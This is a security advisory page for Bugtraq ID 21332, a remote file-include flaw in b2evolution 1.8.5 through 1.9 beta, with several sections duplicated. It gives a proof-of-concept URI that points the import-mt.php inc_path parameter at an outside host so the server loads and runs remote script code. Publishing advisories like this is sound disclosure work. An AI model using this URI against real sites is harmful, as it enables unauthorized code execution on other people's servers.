B2Evolution Import-MT.PHP Remote File Include Vulnerability
BID:21332
Info
B2Evolution Import-MT.PHP Remote File Include Vulnerability
| Bugtraq ID: | 21332 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 28 2006 12:00AM |
| Updated: | Nov 29 2006 10:00PM |
| Credit: | tarkus is credited with the discovery of this vulnerability. |
| Vulnerable: |
b2evolution b2evolution 1.8.5 b2evolution b2evolution 1.9 beta b2evolution b2evolution 1.9 |
| Not Vulnerable: | |
Discussion
B2Evolution Import-MT.PHP Remote File Include Vulnerability
The b2evolution application is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
This issue affects b2evolution 1.8.5 through 1.9 beta.
The b2evolution application is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
This issue affects b2evolution 1.8.5 through 1.9 beta.
Exploit / POC
B2Evolution Import-MT.PHP Remote File Include Vulnerability
An attacker may exploit this issue using a web client.
The following proof-of-concept URI is available:
http://www.example.com/<b2epath>/inc/CONTROL/import/import-mt.php?basepath=foo&inc_path=https://www.example2.com/tarkus/PoC/
An attacker may exploit this issue using a web client.
The following proof-of-concept URI is available:
http://www.example.com/<b2epath>/inc/CONTROL/import/import-mt.php?basepath=foo&inc_path=https://www.example2.com/tarkus/PoC/
Solution / Fix
B2Evolution Import-MT.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
B2Evolution Import-MT.PHP Remote File Include Vulnerability
References:
References: